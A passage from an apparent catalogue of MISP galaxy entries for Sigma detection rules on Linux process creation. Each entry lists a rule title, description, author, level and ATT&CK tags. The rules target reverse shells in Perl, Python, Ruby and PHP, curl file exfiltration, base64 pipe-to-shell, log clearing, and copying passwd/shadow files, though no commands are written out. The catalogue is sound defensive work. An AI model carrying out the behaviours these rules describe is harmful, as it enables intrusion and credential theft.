creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_grep_os_arch_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Potential Discovery Activity Using Find - Linux

Detects usage of "find" binary in a suspicious manner to perform discovery

Internal MISP references

UUID 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf which can be used as unique global reference for Potential Discovery Activity Using Find - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_susp_find_execution.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Clipboard Collection with Xclip Tool

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

Internal MISP references

UUID ec127035-a636-4b9a-8555-0efd4e59f316 which can be used as unique global reference for Clipboard Collection with Xclip Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate usage of xclip tools.']
filename proc_creation_lnx_clipboard_collection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Linux Package Uninstall

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

Internal MISP references

UUID 95d61234-7f56-465c-6f2d-b562c6fedbc4 which can be used as unique global reference for Linux Package Uninstall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/09
falsepositive ['Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).']
filename proc_creation_lnx_remove_package.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Local System Accounts Discovery - Linux

Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Internal MISP references

UUID b45e3d6f-42c6-47d8-a478-df6bd6cf534c which can be used as unique global reference for Local System Accounts Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_local_account.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on linux systems

Internal MISP references

UUID 0cf7a157-8879-41a2-8f55-388dd23746b7 which can be used as unique global reference for Linux Recon Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_recon_indicators.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004', 'attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Linux HackTool Execution

Detects known hacktool execution based on image name.

Internal MISP references

UUID a015e032-146d-4717-8944-7a1884122111 which can be used as unique global reference for Linux HackTool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
creation_date 2023/01/03
falsepositive ['Unlikely']
filename proc_creation_lnx_susp_hktl_execution.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.resource_development', 'attack.t1587']
Related clusters

To see the related clusters, click here.

Chmod Suspicious Directory

Detects chmod targeting files in abnormal directory paths.

Internal MISP references

UUID 6419afd1-3742-47a5-a7e6-b50386cd15f8 which can be used as unique global reference for Chmod Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/03
falsepositive ['Admin changing file permissions.']
filename proc_creation_lnx_susp_chmod_directories.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Python Spawning Pretty TTY

Detects python spawning a pretty tty which could be indicative of potential reverse shell activity

Internal MISP references

UUID c4042d54-110d-45dd-a0e1-05c47822c937 which can be used as unique global reference for Python Spawning Pretty TTY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_python_pty_spawn.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Flush Iptables Ufw Chain

Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

Internal MISP references

UUID 3be619f4-d9ec-4ea8-a173-18fdd01996ab which can be used as unique global reference for Flush Iptables Ufw Chain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/18
falsepositive ['Network administrators']
filename proc_creation_lnx_iptables_flush_ufw.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Potential Perl Reverse Shell Execution

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

Internal MISP references

UUID 259df6bc-003f-4306-9f54-4ff1a08fa38e which can be used as unique global reference for Potential Perl Reverse Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/07
falsepositive ['Unlikely']
filename proc_creation_lnx_perl_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Atlassian Confluence CVE-2022-26134

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

Internal MISP references

UUID 7fb14105-530e-4e2e-8cfb-99f7d8700b66 which can be used as unique global reference for Atlassian Confluence CVE-2022-26134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.execution', 'attack.t1190', 'attack.t1059', 'cve.2022.26134']
Related clusters

To see the related clusters, click here.

Potential Xterm Reverse Shell

Detects usage of "xterm" as a potential reverse shell tunnel

Internal MISP references

UUID 4e25af4b-246d-44ea-8563-e42aacab006b which can be used as unique global reference for Potential Xterm Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/24
falsepositive ['Unknown']
filename proc_creation_lnx_xterm_reverse_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Curl File Upload - Linux

Detects a suspicious curl process start the adds a file to a web request

Internal MISP references

UUID 00b90cc1-17ec-402c-96ad-3a8117d7a582 which can be used as unique global reference for Suspicious Curl File Upload - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins']
filename proc_creation_lnx_susp_curl_fileupload.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.exfiltration', 'attack.t1567', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

Internal MISP references

UUID b8bdac18-c06e-4016-ac30-221553e74f59 which can be used as unique global reference for Potential Ruby Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_ruby_reverse_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Apt GTFOBin Abuse - Linux

Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution

Internal MISP references

UUID bb382fd5-b454-47ea-a264-1828e4c766d6 which can be used as unique global reference for Apt GTFOBin Abuse - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_gtfobin_apt.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

User Has Been Deleted Via Userdel

Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

Internal MISP references

UUID 08f26069-6f80-474b-8d1f-d971c6fedea0 which can be used as unique global reference for User Has Been Deleted Via Userdel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2022/12/26
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_userdel.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

System Information Discovery

Detects system information discovery commands

Internal MISP references

UUID 42df45e7-e6e9-43b5-8f26-bec5b39cc239 which can be used as unique global reference for System Information Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_system_info_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

Internal MISP references

UUID 3e102cd9-a70d-4a7a-9508-403963092f31 which can be used as unique global reference for Linux Network Service Scanning Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_network_utilities_execution.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

Internal MISP references

UUID 9069ea3c-b213-4c52-be13-86506a227ab1 which can be used as unique global reference for Linux Crypto Mining Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners']
filename proc_creation_lnx_crypto_mining.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Terminate Linux Process Via Kill

Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.

Internal MISP references

UUID 64c41342-6b27-523b-5d3f-c265f3efcdb3 which can be used as unique global reference for Terminate Linux Process Via Kill in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2023/03/16
falsepositive ['Likely']
filename proc_creation_lnx_kill_process.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

DD File Overwrite

Detects potential overwriting and deletion of a file using DD.

Internal MISP references

UUID 2953194b-e33c-4859-b9e8-05948c167447 which can be used as unique global reference for DD File Overwrite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Any user deleting files that way.']
filename proc_creation_lnx_dd_file_overwrite.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility

Internal MISP references

UUID 9d779ce8-5256-4b13-8b6f-b91c602b43f4 which can be used as unique global reference for Named Pipe Created Via Mkfifo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/16
falsepositive ['Unknown']
filename proc_creation_lnx_mkfifo_named_pipe_creation.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Suspicious Package Installed - Linux

Detects installation of suspicious packages using system installation utilities

Internal MISP references

UUID 700fb7e8-2981-401c-8430-be58e189e741 which can be used as unique global reference for Suspicious Package Installed - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_install_suspicioua_packages.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Scheduled Cron Task/Job - Linux

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

Internal MISP references

UUID 6b14bac8-3e3a-4324-8109-42f0546a347f which can be used as unique global reference for Scheduled Cron Task/Job - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_schedule_task_job_cron.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

System Network Connections Discovery - Linux

Detects usage of system utilities to discover system network connections

Internal MISP references

UUID 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 which can be used as unique global reference for System Network Connections Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_system_network_connections_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

ESXi VM Kill Via ESXCLI

Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.

Internal MISP references

UUID 2992ac4d-31e9-4325-99f2-b18a73221bb2 which can be used as unique global reference for ESXi VM Kill Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vm_kill.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Shell Execution Of Process Located In Tmp Directory

Detects execution of shells from a parent process located in a temporary (/tmp) directory

Internal MISP references

UUID 2fade0b6-7423-4835-9d4f-335b39b83867 which can be used as unique global reference for Shell Execution Of Process Located In Tmp Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Ufw Force Stop Using Ufw-Init

Detects attempts to force stop the ufw using ufw-init

Internal MISP references

UUID 84c9e83c-599a-458a-a0cb-0ecce44e807a which can be used as unique global reference for Ufw Force Stop Using Ufw-Init in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/18
falsepositive ['Network administrators']
filename proc_creation_lnx_disable_ufw.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

System Network Discovery - Linux

Detects enumeration of local network configuration

Internal MISP references

UUID e7bd1cfa-b446-4c88-8afb-403bcd79e3fa which can be used as unique global reference for System Network Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal and remotephone, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_system_network_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Suspicious Curl Change User Agents - Linux

Detects a suspicious curl process start on linux with set useragent options

Internal MISP references

UUID b86d356d-6093-443d-971c-9b07db583c68 which can be used as unique global reference for Suspicious Curl Change User Agents - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_lnx_susp_curl_useragent.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Potential Python Reverse Shell

Detects executing python with keywords related to network activity that could indicate a potential reverse shell

Internal MISP references

UUID 32e62bc7-3de0-4bb1-90af-532978fe42c0 which can be used as unique global reference for Potential Python Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/24
falsepositive ['Unknown']
filename proc_creation_lnx_python_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

Internal MISP references

UUID 818f7b24-0fba-4c49-a073-8b755573b9c7 which can be used as unique global reference for Linux Webshell Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/10/15
falsepositive ['Web applications that invoke Linux command line tools']
filename proc_creation_lnx_webshell_detection.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

Internal MISP references

UUID d2d642d7-b393-43fe-bae4-e81ed5915c4b which can be used as unique global reference for Scheduled Task/Job At in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_at_command.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance

Internal MISP references

UUID d7821ff1-4527-4e33-9f84-d0d57fa2fb66 which can be used as unique global reference for Print History File Contents in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_history_recon.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004']
Related clusters

To see the related clusters, click here.

Crontab Enumeration

Detects usage of crontab to list the tasks of the user

Internal MISP references

UUID 403ed92c-b7ec-4edd-9947-5b535ee12d46 which can be used as unique global reference for Crontab Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate use of crontab']
filename proc_creation_lnx_crontab_enumeration.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1007']
Related clusters

To see the related clusters, click here.

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

Internal MISP references

UUID f8341cb2-ee25-43fa-a975-d8a5a9714b39 which can be used as unique global reference for BPFtrace Unsafe Option Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2022/02/11
falsepositive ['Legitimate usage of the unsafe option']
filename proc_creation_lnx_bpftrace_unsafe_option_usage.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Potential PHP Reverse Shell

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.

Internal MISP references

UUID c6714a24-d7d5-4283-a36b-3ffd091d5f7e which can be used as unique global reference for Potential PHP Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_php_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

OMIGOD SCX RunAsProvider ExecuteScript

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate use of SCX RunAsProvider ExecuteScript.']
filename proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']
Related clusters

To see the related clusters, click here.

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

Internal MISP references

UUID ba592c6d-6888-43c3-b8c6-689b8fe47337 which can be used as unique global reference for Linux Base64 Encoded Pipe to Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/26
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_base64_execution.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Clear Linux Logs

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

Internal MISP references

UUID 80915f59-9b56-4616-9de0-fd0dea6c12fe which can be used as unique global reference for Clear Linux Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_clear_logs.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.002']
Related clusters

To see the related clusters, click here.

Group Has Been Deleted Via Groupdel

Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

Internal MISP references

UUID 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 which can be used as unique global reference for Group Has Been Deleted Via Groupdel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2022/12/26
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_groupdel.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

Internal MISP references

UUID fe2f9663-41cb-47e2-b954-8a228f3b9dff which can be used as unique global reference for Linux Base64 Encoded Shebang In CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_base64_shebang_cli.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Capabilities Discovery - Linux

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

Internal MISP references

UUID d8d97d51-122d-4cdd-9e2f-01b4b4933530 which can be used as unique global reference for Capabilities Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_capa_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

Internal MISP references

UUID 880973f3-9708-491c-a77b-2a35a1921158 which can be used as unique global reference for Linux Shell Pipe to Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/14
falsepositive ['Legitimate software that uses these patterns']
filename proc_creation_lnx_susp_pipe_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

Curl Usage on Linux

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

Internal MISP references

UUID ea34fb97-e2c4-4afb-810f-785e4459b194 which can be used as unique global reference for Curl Usage on Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_lnx_curl_usage.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

ESXi System Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

Internal MISP references

UUID e80273e1-9faf-40bc-bd85-dbaff104c4e9 which can be used as unique global reference for ESXi System Information Discovery Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_system_discovery.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1033', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

Internal MISP references

UUID 4cad6c64-d6df-42d6-8dae-eb78defdc415 which can be used as unique global reference for Potential Linux Process Code Injection Via DD Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseph Kamau
creation_date 2023/12/01
falsepositive ['Unknown']
filename proc_creation_lnx_dd_process_injection.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1055.009']
Related clusters

To see the related clusters, click here.

Touch Suspicious Service File

Detects usage of the "touch" process in service file.

Internal MISP references

UUID 31545105-3444-4584-bebf-c466353230d2 which can be used as unique global reference for Touch Suspicious Service File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/11
falsepositive ['Admin changing date of files.']
filename proc_creation_lnx_touch_susp.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

ESXi Syslog Configuration Change Via ESXCLI

Detects changes to the ESXi syslog configuration via "esxcli"

Internal MISP references

UUID 38eb1dbb-011f-40b1-a126-cf03a0210563 which can be used as unique global reference for ESXi Syslog Configuration Change Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administrative activities']
filename proc_creation_lnx_esxcli_syslog_config_change.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1562.003']
Related clusters

To see the related clusters, click here.

Bash Interactive Shell

Detects execution of the bash shell with the interactive flag "-i".

Internal MISP references

UUID 6104e693-a7d6-4891-86cb-49a258523559 which can be used as unique global reference for Bash Interactive Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_bash_interactive_shell.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Copy Passwd Or Shadow From TMP Path

Detects when the file "passwd" or "shadow" is copied from tmp path

Internal MISP references

UUID fa4aaed5-4fe0-498d-bbc0-08e3346387ba which can be used as unique global reference for Copy Passwd Or Shadow From TMP Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/31
falsepositive ['Unknown']
filename proc_creation_lnx_cp_passwd_or_shadow_tmp.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Disable Or Stop Services

